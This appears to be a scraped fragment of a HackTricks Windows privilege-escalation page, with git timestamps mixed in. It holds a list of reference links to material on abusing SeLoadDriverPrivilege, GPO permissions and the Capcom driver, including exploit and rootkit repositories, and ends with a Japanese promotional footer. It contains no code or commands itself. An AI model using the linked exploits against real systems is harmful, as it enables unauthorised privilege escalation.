{% embed url="https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges" %}
{% embed url="https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/" %}
{% embed url="https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-b--privileged-accounts-and-groups-in-active-directory" %}
{% embed url="https://docs.microsoft.com/en-us/windows/desktop/secauthz/enabling-and-disabling-privileges-in-c--" %}
{% embed url="https://adsecurity.org/?p=3658" %}
{% embed url="http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/" %}
{% embed url="https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/" %}
{% embed url="https://rastamouse.me/2019/01/gpo-abuse-part-1/" %}
2021-10-18 11:21:18 +00:00
{% embed url="https://github.com/killswitch-GUI/HotLoad-Driver/blob/master/NtLoadDriver/EXE/NtLoadDriver-C%2B%2B/ntloaddriver.cpp#L13" %}
2020-07-15 15:43:14 +00:00
{% embed url="https://github.com/tandasat/ExploitCapcom" %}
{% embed url="https://github.com/TarlogicSecurity/EoPLoadDriver/blob/master/eoploaddriver.cpp" %}
{% embed url="https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys" %}
{% embed url="https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e" %}
{% embed url="https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FNtLoadDriver.html" %}
2022-04-28 16:01:33 +00:00
< details >
2024-01-02 22:36:59 +00:00
< summary > < strong > htARTE (HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ< / strong > < / summary >
HackTricksをサポートする他の方法:
2022-04-28 16:01:33 +00:00
2024-01-02 22:36:59 +00:00
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
2024-01-13 18:44:27 +00:00
* [**公式PEASS & HackTricksグッズ** ](https://peass.creator-spring.com )を手に入れましょう。
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックしてください。
2024-01-13 22:21:48 +00:00
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )に**参加するか**、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )で**フォローしてください。**
2024-01-13 18:44:27 +00:00
* [**HackTricks** ](https://github.com/carlospolop/hacktricks )と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有してください。
2022-04-28 16:01:33 +00:00
< / details >